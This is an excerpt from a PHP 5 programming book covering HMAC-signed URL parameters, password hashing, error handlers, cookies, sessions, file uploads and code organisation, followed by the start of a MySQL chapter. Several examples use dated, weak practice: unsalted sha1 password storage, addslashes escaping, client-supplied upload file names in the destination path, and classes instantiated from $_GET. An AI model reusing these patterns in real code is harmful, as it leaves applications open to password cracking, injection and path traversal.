The output is a link of the same form as before, except that the hash parameter now holds the HMAC digest.

To verify the parameters passed to the script, we can use this script:

function verify_parameters($array)
{
    $data = '';
    $ret = array();

    /* Take the hash out of the array before recalculating it */
    $hash = $array['hash'];
    unset($array['hash']);

    foreach ($array as $key => $value) {
        $data .= $key . $value;
        $ret[] = "$key=$value";
    }

    $h = new Crypt_HMAC(SECRET_KEY, 'md5');
    if ($hash != $h->hash($data)) {
        return FALSE;
    } else {
        return TRUE;
    }
}

/* We use a static array here, but in real life you would be using
 * $array = $_GET or similar. */

$array = array(
    'cause' => 'vars',
    'hash'  => '6a0af635f1bbfb100297202ccd6dce53'
);

if (!verify_parameters($array)) {
    die("Dweep! Somebody tampered with our parameters.\n");
} else {
    echo "Good guys, they didn't touch our stuff!!";
}
?>

The SHA1 hash method gives you more cryptographic strength, but both MD5 and SHA1 are adequate enough for the purpose of checking the validity of your parameters.

5.5.4 Input Filter

By using PHP 5, you can add hooks to process incoming data, but it's mainly targeted at advanced developers with a sound knowledge of C and some knowledge of PHP internals. These hooks are called by the SAPI layer that treats the registering of the incoming data into PHP. One application might be to strip_tags() all incoming data automatically. Although all this can be done in user land with a function such as sanitize_vars(), this solution can only be enforced by writing a script that performs the desired processing and setting auto_prepend_file in php.ini to designate this script. Setting auto_prepend_file causes the processing script to be run at the beginning of every script. On the other hand, the server administrator can enforce a solution. For information on this, see http://www.derickrethans.nl/sqlite_filter.php for an implementation of a filter that uses SQLite as an information source for filter rules.

5.5.5 Working with Passwords

Another application of hash functions is authenticating a password entered in a form on your web site with a password stored in your database. For obvious reasons, you don't want to store unencrypted passwords in your database. You want to prevent evil hackers who have access to your database (because the sysadmin blundered) from stealing passwords used by your clients. Because hash functions are not at all reversible, you can store the password hashed with a function like md5() or sha1() so the evil hackers can't get the password in plain text.

The example Auth class implements two methods, addUser() and authUser(), and makes use of the sha1() hashing function. The table scheme looks like this:

    CREATE TABLE users (
        email  VARCHAR(128) NOT NULL PRIMARY KEY,
        passwd CHAR(40) NOT NULL
    );

We use a length of 40 here, which is the same as the length of the sha1() digest in hexadecimal characters:

[Listing of the Auth class not preserved.]

We didn’t use addslashes() around the $email and $password variables earlier. We will do that in the script that calls the methods of this class:

    /* Define our parameters */
    $sigs = array (
        'email'  => array ('required' => TRUE, 'type' => 'string',
                           'function' => 'addslashes'),
        'passwd' => array ('required' => TRUE, 'type' => 'string',
                           'function' => 'addslashes')
    );

    /* Clean up our input */
    sanitize_vars(&$_POST, $sigs);

    /* Instantiate the Auth class and add the user */
    $a = new Auth();
    $a->addUser($_POST['email'], $_POST['passwd']);

    /* or... we instantiate the Auth class and validate the user */
    $a = new Auth();
    echo $a->authUser($_POST['email'], $_POST['passwd']) ? 'OK' : 'ERROR';
    ?>

After the user is added to the database, something like this appears in your table:

    +--------+------------------------------------------+
    | user   | password                                 |
    +--------+------------------------------------------+
    | derick | 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 |
    +--------+------------------------------------------+

The first person who receives the correct password back from this sha1() hash can ask me for a crate of Kossu.

5.5.6 Error Handling

During development, you probably want to code with error_reporting set to E_ALL | E_STRICT. Doing so helps you catch some bugs. If you have set error_reporting to E_ALL | E_STRICT, the executed script will show you errors like this:

    Warning: Call-time pass-by-reference has been deprecated - argument passed by value; If you would like to pass it by reference, modify the declaration of sanitize_vars(). If you would like to enable call-time pass-by-reference, you can set allow_call_time_pass_reference to true in your INI file. However, future versions may not support this any longer.

The reason for this is that we prefixed $_POST in the call to sanitize_vars() with the reference operator, which is no longer supported. The correct line is:

    sanitize_vars($_POST, $sigs);

However, you definitely do not want to see error messages like these on your production sites, and you especially do not want your customers to see them. Not only is it unsightly, but some debuggers show the full parameters, including username and password, which is information that should be kept private. PHP has features that make the experience much nicer for you, your customers, and visitors to the site. With the php.ini directives 'log_errors' and 'display_errors', you can control where the errors appear. If you set the log_errors directive to 1, all errors are recorded in a file that you specify with the error_log directive. You can set error_log to syslog or to a file name.

In some cases, recording errors in a file (rather than displaying them to the user) may not make the experience nicer for the visitors. Instead, it may result in an empty or broken page. In such cases, you may want to tell visitors that something went wrong, or you may want to hide the problem from visitors. PHP supports a customized error handler that can be set with set_error_handler(). This function accepts one parameter that can be either a string containing the function name for the error-handling function or an array containing a classname/methodname combination. The error-handling function should be defined like

    error_function($type, $error, $file, $line)

The $type is the type of error that is caught and can be either E_NOTICE, E_WARNING, E_USER_NOTICE, E_USER_WARNING, or E_USER_ERROR. No additional errors should be possible because the PHP code and the extensions are not supposed to emit other errors except parse errors or other low-level error messages. $error is the textual error message. $file and $line are the file name and line number on which the error occurred.

By using the error handler, you can tell the user in a nice way that something went wrong (for instance, in the layout of your site) or you can redirect the user to the main page (to hide the fact that something went wrong). The redirect, of course, will only work if no output was sent before the redirect, or if you have output_buffering turned on. Note that a user-defined error handler captures all errors, even if the error_reporting level tells PHP that not all errors should be shown.
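As a rough illustration of the handler described above, the following sketch registers a class method with set_error_handler() (the classname/methodname form) and records what the handler receives. The class name ErrorCollector and its $entries property are made up for this example; a real handler would more likely write to a log and show a friendly page.

```php
<?php
/* Hypothetical class for this example only. */
class ErrorCollector
{
    /* Everything the handler has seen so far. */
    public static $entries = array();

    /* The four parameters follow the description in the text. */
    public static function handle($type, $error, $file, $line)
    {
        self::$entries[] = array(
            'type'    => $type,
            'message' => $error,
            'file'    => $file,
            'line'    => $line,
        );
        /* Returning true tells PHP the error has been dealt with,
         * so the built-in handler does not display it as well. */
        return true;
    }
}

/* Register the handler as a classname/methodname combination. */
set_error_handler(array('ErrorCollector', 'handle'));

/* Raise a user-level warning to see the handler at work. */
trigger_error('Could not load the sidebar', E_USER_WARNING);

/* Put the previous handler back when done. */
restore_error_handler();
```

After this runs, ErrorCollector::$entries holds one entry describing the warning, and nothing has been shown to the visitor.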

5.6 Cookies

The simple registration we used earlier in this chapter does not make data persistent across requests. If you go to the next page (such as by clicking a link or by entering a different URL in your browser’s address bar), the posted data is gone. One simple way to maintain data between the different pages in a web application is with cookies. Cookies are sent by PHP through the web server with the setcookie() function and are stored in the browser. If a time-out is set for the cookie, the browser will even remember the cookie when you restart your computer; without the time-out set, the browser forgets the cookie as soon as the browser closes. You can also set a cookie to be valid only for a specific subdomain, rather than having the cookie sent by the browser to the script whenever the domain of the script is the same as the domain where the cookie was set (the default). In the next example, we set a cookie when a user has successfully logged in with the login form:

[Listing of the login script not preserved. The surviving text shows a page titled “Login” with the heading “Log-in” and form fields labeled “E-mail address:” and “Password:”.]

The check_auth() function checks whether the username and password match with the stored data and returns either the user id that belongs to the user or 0 when an error occurred. The line

    setcookie('uid', $uid, time() + 14400, '/');

tells the web server to add a cookie header to send to the browser. uid is the name of the cookie to be set, and $uid holds the value of the uid cookie. The expression time() + 14400 sets the expiry time of the cookie to the current time plus 14,400 seconds, which is 4 hours. The time on the server must be correct because the time() function is the base for calculating the expiry time. Notice that the ob_start() function is the first line of the script. ob_start() turns on output buffering, which is needed to send cookies (or other headers) after you output data. Without this call to ob_start(), the output to the browser would have started at the first line of HTML in the script, making it impossible to send any headers, and resulting in an error such as “Warning: Cannot modify header information - headers already sent” when trying to add another header (with setcookie() or header()).

Instead of using output buffering (which is memory-intensive), you can, of course, change your script so that data is not output until after you set any headers.

Cookies are sent by the script/web server to the browser. The browser is then responsible for sending the cookie, via HTTP request headers, to all successive pages that belong to your web application. With the fourth and fifth parameters of the setcookie() function, you can control which sections of your web site receive the specific cookie headers. The fourth parameter is /, which means that all pages in the domain (the root and all subdirectories) should receive the cookie data. The fifth parameter controls which domains receive the cookie header. For instance, if you use .example.com, the cookie is available to all subdomains of example.com.
Or, you could use admin.example.com, restricting the cookies to the admin part of your application. In this case, we did not specify a domain, so all pages in the web application receive the cookie.

After the line with the setcookie() call, a line issues a redirect header to the browser. This header requires the full path to the destination page. After the header line, we terminate the script with exit() so that no headers can be set from later parts of the code. The browser redirects to the given URL by requesting the new page and discarding the content of the current one.

On any web page requested after the script that called setcookie(), the cookie data is available in your script in a manner similar to the GET and POST data. The superglobal to read cookies is $_COOKIE. The following index.php script shows the use of cookies to authenticate a user. The first line of the page checks whether the cookie with the user id is set. If it’s set, we display our index.php page, echoing the user id set in the cookie. If it’s not set, we redirect to the login page:

[Listing of index.php not preserved. The surviving text shows a page titled “Index page” that prints “Logged in with UID:” followed by the user id, and a “Log out.” link.]

Using this user id for important items, such as remembering authentication data (as we do in this script), is not wise, because it’s easy to fake cookies. (For most browsers, it is enough to edit a simple text field.) A better solution, using PHP sessions, follows in a bit.

Deleting a cookie is almost the same as setting one. To delete it, you use the same parameters that you used when you set the cookie, except for the value, which needs to be an empty string, and the expiry date, which needs to be set in the past. On our logout page, we delete the cookie this way:

[Listing of the logout script not preserved.]

The time() - 86400 is exactly one day ago, which is sufficiently in the past for our browser to forget the cookie data. Figure 5.3 shows the way our scripts can be tied together.

As previously mentioned, putting authentication data into cookies (as we did in the previous examples) is not secure because cookies are so easily faked. PHP has, of course, a better solution: sessions.
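To make the symmetry between setting and deleting a cookie concrete, here is a small sketch. The helper names uid_cookie_args() and expired_uid_cookie_args() are invented for this illustration; they only build the argument lists, and the actual setcookie() call is skipped on the command line, where there is no browser to receive the header.

```php
<?php
/* Hypothetical helper: arguments for setting the 'uid' cookie
 * for four hours (14,400 seconds) on the whole site. */
function uid_cookie_args($uid, $now)
{
    return array('uid', (string) $uid, $now + 14400, '/');
}

/* Hypothetical helper: the same name and path, but an empty value
 * and an expiry time one day in the past, which deletes the cookie. */
function expired_uid_cookie_args($now)
{
    return array('uid', '', $now - 86400, '/');
}

$now    = time();
$set    = uid_cookie_args(42, $now);
$delete = expired_uid_cookie_args($now);

/* In a web request, and before any output has been sent,
 * pass the arguments on to setcookie(). */
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    call_user_func_array('setcookie', $delete);
}
```

Keeping the name and path identical in both calls matters, because the browser only replaces a cookie whose name, path, and domain match the one it stored.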

[Fig. 5.3 Scripts tied together. The diagram connects index.php, login.php, and logout.php with these transitions: “cookie ‘uid’ not set” (redirect), “correct username/password entered / cookie set” (redirect), “wrong username/password entered”, “logout link clicked”, and “cookie unset” (redirect).]

5.7 Sessions

A PHP session allows an application to store information for the current “session,” which can be defined as one user being logged in to your application. A session is identified by a unique session ID. PHP creates a session ID that is an MD5 hash of the remote IP address, the current time, and some extra randomness represented in a hexadecimal string. This session ID can be passed in a cookie or added to all URLs to navigate your application. For security reasons, it’s better to force the user to have cookies enabled than to pass the session ID on the URL (which normally can be done manually by adding ?PHPSESSID= followed by the session ID, or by turning on session.use_trans_sid in php.ini), where it might end up in the web server’s logs as an HTTP_REFERER or be found by some evil person monitoring your traffic. That evil person can still see the session cookie data, of course, so you might want to use an SSL-enabled server to be really safe. But, to continue discussing sessions, we’re going to rewrite the previous cookie example using sessions. We create a file called session.inc that sets some session values, as shown in the following example, and include this file at the beginning of any script that is part of the session:
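The listing itself is not reproduced here. Going by the description that follows it, a session.inc along these lines would fit; treat it as a reconstruction under that assumption rather than the authors’ exact file.

```php
<?php
/* Reconstructed from the surrounding description; not the original listing. */

/* Propagate the session ID in a cookie. */
ini_set('session.use_cookies', '1');

/* Discard any session ID that arrives in the URL. */
ini_set('session.use_only_cookies', '1');

/* Must come after the ini_set() calls and before any output. */
session_start();
```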

On the first line, the configuration parameter 'session.use_cookies' is set to 1, which means that cookies will be used for propagation of the session ID. On the second line, 'session.use_only_cookies' is set to 1, which means that a session ID passed in the URL to the script will be discarded. The second setting requires that users have cookies enabled to use sessions. If you cannot rely on people having cookies enabled, you can either remove this line, or you can change the value to 0, which ensures that there is no global setting for this configuration parameter in php.ini or another place.

Tip: You can configure the place where PHP will store session files with the session.save_path configuration setting.

The session_start() function must come after any session-related settings are done with ini_set(). session_start() initializes the session module, setting some headers (such as the session ID cookie and some caching-prevention headers), requiring its placement before any output has been sent to the browser. If no session ID is available at the time session_start() is called, a new session ID is created, and the session is initialized with an empty $_SESSION array. Adding elements to the $_SESSION array is easy, as shown in the following example. This modified version of our login page shows the changed lines in bold:

[Listing of the modified login page not preserved. The surviving text shows the page title “Login” and the comment /* HTML form comes here */.]

Tip: You can call session_name('NAME') before calling session_start() in your script to change the default PHPSESSID name of the session ID cookie.

We first include our session.inc file. Adding the session variable 'uid' to the session is done easily by setting the uid element of the $_SESSION superglobal to the value of $uid. Unsetting a session variable can be done with unset($_SESSION['uid']).

Tip: If you need to process a lot of data after modifying your session variables, you might want to call session_write_close(), which is normally done automatically at the end of the script. This writes the session file to disk and unlocks the file from the operating system so that other scripts may use the session file. (You will notice that pages in a frame set might load serially if they use sessions because the session file is locked by PHP.)

Tip: The locking described here will not always work on NFS, so scripts in a frame set might still get the old non-updated session data. Avoid using NFS to store session files.

Logging out is the same as destroying the session and its associated data, as we see in the logout script:

[Listing of the logout script not preserved.]

We still need to initialize the session with session_start(), after which we can clear the session by setting the $_SESSION superglobal to an empty array. Then, we destroy the session and its associated data by calling session_destroy().

Session variables are accessed from the $_SESSION superglobal. Each element contains a session variable, using the session-variable name as key. In our index.php script, we moved the if statement that checks whether a user is logged in to a special function that we place in the session.inc file:

    function check_login() {
        if (!isset ($_SESSION['uid']) || !$_SESSION['uid']) {
            /* If no UID is in the session, we redirect to the login page */
            header('Location: http://kossu/session/login.php');
        }
    }
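The same check can be written so that the decision is separate from the redirect, which makes it easy to try out without a browser. This is only a sketch: the function name is_logged_in() is made up here, the session data is passed in as a plain array instead of being read from $_SESSION inside the helper, and the exit() after the redirect is an addition in the spirit of the cookie example earlier in the chapter.

```php
<?php
/* Hypothetical helper: true when the array holds a non-zero 'uid'. */
function is_logged_in(array $session)
{
    return isset($session['uid']) && (bool) $session['uid'];
}

/* The check_login() function from the text, rewritten on top of the
 * helper. It is only defined here, not called. */
function check_login()
{
    if (!is_logged_in($_SESSION)) {
        header('Location: http://kossu/session/login.php');
        /* Stop here so that the protected page is not rendered. */
        exit();
    }
}
```

A page that requires a logged-in user would include session.inc first and then call check_login() before producing any output.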

In this function, we check whether the 'uid' session variable exists and whether the value of the 'uid' session variable is not 0. If one of the checks fails, we redirect users to the login page; otherwise, we do nothing and let the calling script handle it from there. We call the check_login() function on every page where we require a user to be logged in. We need to make sure the session.inc file is included before any output is produced because it may need to send headers to the browser. Here is a snippet from the modified index.php script:

[Listing of the modified index.php not preserved.]

Using sessions can be as simple as what’s shown here. Or, you can tweak some more parameters. Check out the php.ini-dist file that accompanies the PHP distributions.

5.8 File Uploads

We haven’t yet covered one type of input: uploading files. You can use the file upload feature of PHP to upload images or related materials, for example. Because the browser needs to do a little bit more than just send a POST with the relevant data, you need to use a specially crafted form for file uploads. Here is an example of such a special form:

[Listing of the upload form only partly preserved. The surviving fragments are the form attributes enctype="multipart/form-data" and action="handle_img.php", an input ending in type="file" />, and the label “Send this file:”.]

The differences between file upload forms and normal forms are bold in the code listing. First, an enctype attribute, included in the form tag, instructs the browser to send a different type of POST request. Actually, it’s a normal POST request, except the body containing the encoded files (and other form fields) is completely different. Instead of the simple field=var&field2=var2 syntax, something resembling a “text and HTML” email is sent in the body, with each part being a form field.

The file upload field itself is the type file, which displays an input field and a browse button that allows a user to browse through the file system to find a file. The text on the browse button can’t be changed, so it is usually localized.

(Mozilla in English uses “Browse,” IE in Dutch uses “Bladeren,” and so on.) The hidden input field passes a MAX_FILE_SIZE value to the browser, setting the maximum allowable size of the file being uploaded. However, most browsers ignore this extra field, so it’s up to you in the handler script to accept or deny the file.

5.8.1 Handling the Incoming Uploaded File

The $_FILES array contains an array of information about each file that is uploaded. The handler script can access the information using the name of the file upload field as the key. The $_FILES['book_image'] variable contains the following information for the uploaded file.

    Key | Value | Description
    name | string(8) "p5pp.jpg" | The original name of the file on the file system of the user who uploaded it.
    type | string(10) "image/jpeg" | The MIME type of the file. For a JPG image, this can be either image/jpeg or image/pjpeg, and all other types have their dedicated MIME type.
    tmp_name | string(14) "/tmp/phpyEXxWp" | The temporary file name on the server’s file system. PHP will clean up after the request has finished, so you are required to do something with it inside the script that handles the request (either delete or move it).
    error | int(0) | The error code. See the next paragraph for an explanation.
    size | int(2045) | The size in bytes of the uploaded file.

A few possible errors can occur during a file upload. Most errors relate to the size of the uploaded file. Each error code has an associated constant. The following table shows the error conditions.

    # | Constant | Description
    0 | UPLOAD_ERR_OK | The file was uploaded successfully and no errors occurred.
    1 | UPLOAD_ERR_INI_SIZE | The size of the uploaded files exceeded the value of the upload_max_filesize setting from php.ini.
    2 | UPLOAD_ERR_FORM_SIZE | The size of the uploaded files exceeded the value of the special form field MAX_FILE_SIZE. Because users can easily fake the size, you cannot rely on this one, and you always have to check the sizes yourself in the script by using $_FILES['book_image']['size'];.
    3 | UPLOAD_ERR_PARTIAL | There was a problem uploading the file because only a partial file was received.
    4 | UPLOAD_ERR_NO_FILE | There was no file uploaded at all because the user did not select any in the upload form. This is not always an error; this field might not be required.
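The error table above can be turned into a small lookup. The following is a sketch rather than part of the handler discussed in this section: the function name upload_error_message() and the wording of the messages are assumptions, while the UPLOAD_ERR_* constants are the ones listed in the table.

```php
<?php
/* Hypothetical helper: returns false when the upload succeeded,
 * or a short message describing what went wrong. */
function upload_error_message($code)
{
    switch ($code) {
        case UPLOAD_ERR_OK:
            return false;
        case UPLOAD_ERR_INI_SIZE:
            return 'The file is larger than upload_max_filesize allows.';
        case UPLOAD_ERR_FORM_SIZE:
            return 'The file is larger than the MAX_FILE_SIZE field allows.';
        case UPLOAD_ERR_PARTIAL:
            return 'Only part of the file was received.';
        case UPLOAD_ERR_NO_FILE:
            return 'No file was selected.';
        default:
            /* Covers codes added by later PHP versions. */
            return 'An unknown upload error occurred.';
    }
}
```

A handler could call upload_error_message($_FILES['book_image']['error']) and continue with its own size and type checks only when the result is false.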

After learning all this theory, we now examine the script that handles an uploaded file. In this script, we check if the size is acceptable (we don’t want more than 50KB for the uploaded images) and if the uploaded file is of the correct type (we only want JPEG and PNG files). Of course, we also check the error codes shown in the previous table and use the correct way of moving it to our uploaded images directory:

[The opening part of this listing was not preserved.]

Perhaps somebody played tricks and didn’t use the form we provided. Thus, we need to check whether the posted form actually contains our book_image field. The previous code sets the error message to a not-false value. We check for this in later logic:

    } else {
        $book_image = $_FILES['book_image'];
    }

    /* We check for all possible error codes we might get */
    switch ($book_image['error']) {
        case UPLOAD_ERR_INI_SIZE:
            $err_msg = 'The size of the image is too large, '.
                "it can not be more than $max_photo_size bytes.";
            break 2;

This error occurs when an uploaded file exceeds the php.ini setting upload_max_filesize, which limits the size of each uploaded file and defaults to 2MB. Three other php.ini settings are important. One is post_max_size, which controls the maximum allowed size of a POST request (it defaults to 8MB). The second is file_uploads, which determines whether HTTP file uploads are allowed at all (it defaults to On). The last setting affecting file uploads is upload_tmp_dir, which specifies the temporary directory where files are uploaded (it defaults to /tmp on UNIX-like operating systems or the configured temporary directory on Windows).

        case UPLOAD_ERR_PARTIAL:
            $err_msg = 'An error occurred while uploading the file, '.
                "please try again.";
            break 2;

This error occurs if the size of the uploaded file did not match the size advertised in the header. The problem can be caused, for example, by a network connection that suddenly broke.

        case UPLOAD_ERR_NO_FILE:
            if ($upload_required) {
                $err_msg = 'You did not select a file to be uploaded, '.
                    "please do so here.";
                break 2;
            }
            break 2;

We only issue an error if we require a file to be uploaded. Remember that we set the Boolean variable $upload_required at the top of our script to true:

        case UPLOAD_ERR_FORM_SIZE:
            $err_msg = 'The size was too large according to '.
                'the MAX_FILE_SIZE hidden field in the upload form.';
        case UPLOAD_ERR_OK:
            if ($book_image['size'] > $max_photo_size) {
                $err_msg = 'The size of the image is too large, '.
                    "it can not be more than $max_photo_size bytes.";
            }
            break 2;

Because we cannot rely on the user-supplied MAX_FILE_SIZE, we always need to check for the size ourselves. UPLOAD_ERR_OK is similar, except that the image will not be available in the temporary directory if it was larger than the MAX_FILE_SIZE:

        default:
            $err_msg = "An unknown error occurred, ".
                "please try again here.";
    }

We should never receive an unknown error, but it is good practice to build in a case for this. Also, if another error type is added in newer PHP versions, your script won’t break:

    /* Now we check for the mime type to be correct, we allow
     * JPEG and PNG images */
    if (!in_array(
        $book_image['type'],
        array ('image/jpeg', 'image/pjpeg', 'image/png')
    )) {
        $err_msg = "You need to upload a PNG or JPEG image, ".
            "please do so here.";
        break;
    }

With this code, we check whether to accept the file by looking at its MIME type. Note that some browsers might do things differently than others, so it’s good to test all browsers and see what MIME type they use for specific files.

Tip: On http://www.webmaster-toolkit.com/mime-types.shtml, you can find an extensive list of MIME types.

    } while (0);

    /* If no error occurred we move the file to our upload directory */
    if (!$err_msg) {
        if (!@move_uploaded_file(
            $book_image['tmp_name'],
            $upload_dir . $book_image['name']
        )) {
            $err_msg = "Error moving the file to its destination, ".
                "please try again here.";
        }
    }
    ?>

We use the “special” function move_uploaded_file() to move the file to its final destination. This function checks whether the file is really an uploaded file, so that the script cannot be tricked into treating the temporary file as something other than the file we specified, such as /etc/passwd. The function is_uploaded_file() returns true if the file is an uploaded file or false if it is not.

[The HTML part of this listing was not preserved. The surviving text shows a page titled “Upload handler” and the end of a tag, '/>.]

We echo the error message in the body of the script in case there was an error uploading the file. (Remember that we initialized it to false at the top of the script.) In case the file upload succeeded, we construct an image tag to display the uploaded image on our resulting page.

Tip: If you want to add the width and height attributes to the image tag, you can use the getimagesize() function to do so.

For more information about file uploading, see “The PHP Manual” at http://www.php.net/manual/en/features.file-upload.php.
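The checks in the handler can also be gathered into one function that works on a $_FILES entry as a plain array. The sketch below is an illustration only: check_image_upload() and safe_target() are invented names, the /var/www/uploads/ directory is a placeholder, and running the client-supplied file name through basename() is an extra precaution that the listing above does not take.

```php
<?php
/* Hypothetical helper: returns false when the upload is acceptable,
 * or an error message when it is not. */
function check_image_upload(array $file, $max_size)
{
    $allowed = array('image/jpeg', 'image/pjpeg', 'image/png');

    if ($file['error'] !== UPLOAD_ERR_OK) {
        return 'The upload failed with error code ' . $file['error'] . '.';
    }
    if ($file['size'] > $max_size) {
        return "The image can not be more than $max_size bytes.";
    }
    if (!in_array($file['type'], $allowed)) {
        return 'You need to upload a PNG or JPEG image.';
    }
    return false;
}

/* Hypothetical helper: strips any directory part from the name
 * supplied by the browser before building the destination path. */
function safe_target($upload_dir, $client_name)
{
    return rtrim($upload_dir, '/') . '/' . basename($client_name);
}

/* A made-up $_FILES entry with a suspicious file name. */
$example = array(
    'name'     => '../../etc/passwd',
    'type'     => 'image/png',
    'tmp_name' => '/tmp/phpyEXxWp',
    'error'    => UPLOAD_ERR_OK,
    'size'     => 2045,
);

$problem = check_image_upload($example, 50000);
$target  = safe_target('/var/www/uploads/', $example['name']);

/* A real handler would now call
 * move_uploaded_file($example['tmp_name'], $target). */
```

Because the function receives the array as a parameter, it can be exercised with hand-made data like $example before it is wired to a real form.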

5.9 Architecture

In this section, we discuss a few ways to organize the code in your web application. Although we cannot present you with every possible way of organizing code, we can at least discuss some of the most common ways.

5.9.1 One Script Serves All

One script serves all stands for the idea that one script, usually index.php, handles all the requests for all different pages. Different content is passed as parameters to the index.php script by adding URL parameters such as ?page=register. It is not wise to store all code in the index.php script itself, but you can include the required code into the script. Figure 5.4 shows how it might work.

[Fig. 5.4 The “one script serves all” approach. The diagram shows index.php (Mainpage) together with products.php (ProductCategory), contact.php (Contact), and about.php (About).]

As you can see, there is a case for every module (about, contact, products). In this application, a specific file and class can handle the request. You can imagine that, in case you have many different modules, the switch case will grow large, so it might be worthwhile to do it dynamically by loading a number of modules from a dedicated directory, like the following (pseudo code):

    foreach (directory in "modules/") {
        if file_exists("definition.php") {
            module_def = include "definition";
            register_module(module_def);

        }
    }
    if registered_module($_GET['module']) {
        $driver = new $_GET['module'];
        $driver->execute();
    }
    ?>

5.9.2 One Script per Function

Another alternative is the one script per function approach. Here, there is no driver script like in the previous section, but each function is stored in a different script and accessed through its URL (for example, about.php, where in the previous example, we had index.php?page=about). Both styles have pros and cons; in the “one script serves all” method, you only have to include the basics (like session handling, connecting to a database) in one script, while with this method, you have to do that in each script that implements the functionality. On the other hand, a monolithic script is often harder to maintain (because you have to dig through more files to find your problem).

Of course, it’s always up to you, the programmer, to make decisions regarding the layout of your application. The only real advice that we can give is that you always need to think before you implement. It helps to sit down and brainstorm about how to lay out your code.

5.9.3 Separating Logic from Layout

In each of the two approaches, you always need to strive to separate your logic from the layout of your pages. There are a few ways to do this, for example, with a templating engine (see Chapter 14, “Performance”), but you can also use your own templating method, perhaps something similar to this example:

template.tpl (the HTML markup of this listing was not preserved; only this PHP fragment remains):

    <?php echo $tpl['title']; ?>

This file is the “static” part of the site, and it’s the same for most pages. It’s simply HTML with some PHP statements to echo simple variables that are filled in by logic in the script that uses this template.

list_parts.tpl.php (the HTML markup inside this listing was not preserved; what remains is shown as is):

    NameCity
    END;
    $footer = <<
    END;
    $item = "{name}{city}";
    ?>

This file contains elements for use in a dynamic list. You see that in the $item variable, we also have two placeholders ({name} and {city}) which are used by the logic to fill in data.

show_names.php (the opening of this listing, including the first array key, was not preserved):

    ... 'Tel Aviv', 'Derick' => 'Skien', 'Stig' => 'Trondheim');
    $items = '';
    foreach ($list as $name => $city) {
        $items .= str_replace(
            array('{name}', '{city}'),
            array($name, $city),
            $item
        );
    }
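The substitution step in the loop above can be tried on its own. In the following sketch, the table-row markup in $item is an assumption (the markup used by the authors is not visible here), the list is shortened to two entries, and htmlspecialchars() is added as a precaution that is not part of the listing.

```php
<?php
/* Assumed row markup with the two placeholders from the text. */
$item = "<tr><td>{name}</td><td>{city}</td></tr>\n";

/* Two of the entries that appear in the listing. */
$list = array('Derick' => 'Skien', 'Stig' => 'Trondheim');

$items = '';
foreach ($list as $name => $city) {
    /* Replace both placeholders in one call, escaping the values
     * so that they cannot inject markup into the page. */
    $items .= str_replace(
        array('{name}', '{city}'),
        array(htmlspecialchars($name), htmlspecialchars($city)),
        $item
    );
}
```

After the loop, $items contains one filled-in row per list entry, ready to be placed between a header and a footer.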

After initializing our variables, we loop through the array and concatenate the filled-in $item variable to the $items variable, which will contain the layout for all items in the list:

    $tpl = array();
    $tpl['title'] = "List with names";
    $tpl['description'] = "This list shows names and the cities.";
    $tpl['content'] = $header . $items . $footer;
    include 'template.tpl';
    ?>

At last, we create the $tpl array, fill in the items that the template wants, and include the template file. Because the variables are now set, the included template is displayed with the data filled in. This is, of course, only one method of attacking this problem; I’ll leave the rest to your imagination.

5.10 Summary

PHP is easily embedded into HTML files, displaying HTML forms that collect data entered by users and files that users upload. Collecting information from users presents security issues for the web site and for any user information stored at the web site. For security, PHP should have register_globals set to Off. To attack your web site or steal your data, the bad guys use techniques like cross-site scripting (executing pieces of client-side scripting on your site) and SQL injection (inserting malicious code into queries run on your database). To protect against attacks, you must distrust all data that originates from users. You need to carefully validate all data that you receive from users and test it to be sure it is safe, not dangerous to your web site. You can protect your web site when users upload files by checking the file size and type of the uploaded file. In addition, you can protect the information that is visible in your browser address window (information passed in the URL) by hashing it using one of several methods, including a PEAR class, called Crypt_HMAC, which was developed for hashing purposes.
Hashing is also useful to protect passwords stored for the purpose of authenticating users. Another useful measure to protect your web site from user mistakes or bad-guy attacks is to develop your own error handler to recognize when something is not as it should be and to handle the problem.

For a web application to be useful, the application data must be available to all the web pages in the application during a user session. One way to pass data from one web page to the next is by using cookies. When the user accesses the web page, a login page is displayed and the account and password entered by the user into the form are checked against the account and password that are stored for the user. If the user is authenticated, a cookie is set. The information in the cookie is automatically passed with any requested page. A second method of making data persistent across web pages is to use the PHP session features. Once you start a PHP session, you can store variables that are available to other scripts in the session.

Once you know all the pieces you need for your web application, you need to organize them into a useful whole. One common method of organization is called “one script serves all,” which means that index.php handles all the requests for different pages. Another common organization is “one script per function.” A general principle is to separate layout from logic. After you organize the pieces into a comprehensive application, you’re off to the races.


CHAPTER 6 Databases with PHP 5

6.1 Introduction

A ubiquitous part of any PHP book is the topic of databases and database interfacing with PHP. This book is no different, simply because most people who write PHP applications want to use a database. Many good books exist on database design and using databases with PHP. This chapter introduces using MySQL and SQLite from PHP, but focuses primarily on the PHP 5-specific details of database interfacing.

After you finish reading this chapter, you will have learned

☞ Some of the strong and weak points of MySQL and SQLite, and the types of applications at which they excel
☞ Interfacing with MySQL with the new mysqli extension
☞ How to use PHP 5’s bundled sqlite extension
☞ How to use PEAR DB to write more portable database code

A Note About Version Numbers

This chapter focuses on the new database connectivity features of PHP 5, specifically the mysqli and sqlite extensions. To enjoy all the new functionality described in this chapter, you need reasonably current versions of the various packages:

☞ MySQL 4.1.2 or newer
☞ SQLite as bundled with PHP 5.0.0 or newer
☞ PEAR DB 1.6 or newer

6.2 MySQL

MySQL and PHP have become the “bread and butter” of web application builders. It is the combination you are most likely to encounter today and probably for the years to come. Consequently, this is also the first database covered in this chapter.

This chapter focuses on the new mysqli (or MySQL Improved) extension that is bundled with PHP 5. As mentioned in the chapter introduction, the mysqli extension requires that you use at least version 4.1.2 of the MySQL server.

6.2.1 MySQL Strengths and Weaknesses

This section contains some information about the strengths and weaknesses of MySQL.

6.2.1.1 Strength: Great Market Penetration
MySQL has the biggest market share of any open source database. Almost any web-hosting company can provide MySQL access, and books and articles about MySQL and PHP are abundant.

6.2.1.2 Strength: Easy to Get Started
After your database is set up and you have access to it, managing the database is straightforward. Initial access needs to be configured by a database administrator (if that person is not you). Tools such as MySQL Administrator or phpMyAdmin let you manage your database.

6.2.1.3 Strength: Open-Source License for Most Users
MySQL comes with a dual license: either GPL or a commercial license. You can use MySQL under the GPL as long as you are not commercially redistributing it.

6.2.1.4 Strength: Fast
MySQL has always been relatively fast, largely due to its simplicity. In the last few years, MySQL has gained a foothold in the enterprise market due to new “enterprise class” features and general maturity, without compromising performance for simple usage.

6.2.1.5 Weakness: Commercial License for Commercial Redistribution
